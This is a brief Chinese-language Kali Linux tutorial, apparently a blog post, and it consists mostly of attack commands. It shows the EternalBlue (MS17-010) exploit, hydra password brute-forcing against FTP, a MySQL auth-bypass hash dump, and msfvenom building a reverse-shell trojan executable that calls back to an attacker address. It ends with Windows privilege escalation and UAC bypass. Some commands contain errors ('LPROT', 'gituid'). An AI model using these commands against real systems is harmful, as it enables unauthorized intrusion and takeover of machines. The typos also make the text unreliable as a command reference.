还是老样子,仅供有一定基础的朋友Kali Linux入门,毕竟这不是完整的详细教程,你不一定能看懂,但是原理是没任何问题的。以下都是一些简单的示例:其它的示例以此类推就可以了。
一、Kali Linux漏洞扫描
Web层面:Kali自带的owasp-zap、w3af
系统层面:Openvas、Nessus
二、Kali Linux漏洞利用
1、漏洞利用复现MS17-010测试
msf5 > use exploit/windows/smb/ms17_010_eternalblue
2、端口安全问题弱口令攻击
弱口令:FTP登陆
msf5 > use auxiliary/scanner/ftp/ftp_login或
root@kali:/# hydra -l user -P passlist.txt ftp://192.168.1.104
3、端口安全问题服务版本漏洞攻击
服务漏洞:MySQL 5.5.23
msf5 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
三、Kali Linux MSF木马反弹程序生成技术
第一步:
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPROT=888 -f exe -o fujieace.exe
第二步:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
四、Kali Linux MSF权限提升
以下是以windows举例的,如果遇到Linux只需要选择相应的Linux模块即可!原理都是相同的。
第一种:自带的权限提升
meterpreter > gituid
meterpreter > getsystem
第二种:利用溢出漏洞提升
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms11_080_afdjoinleaf
msf5 exploit(windows/local/ms11_080_afdjoinleaf) > set session 2
第三种:UAC权限提升
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac
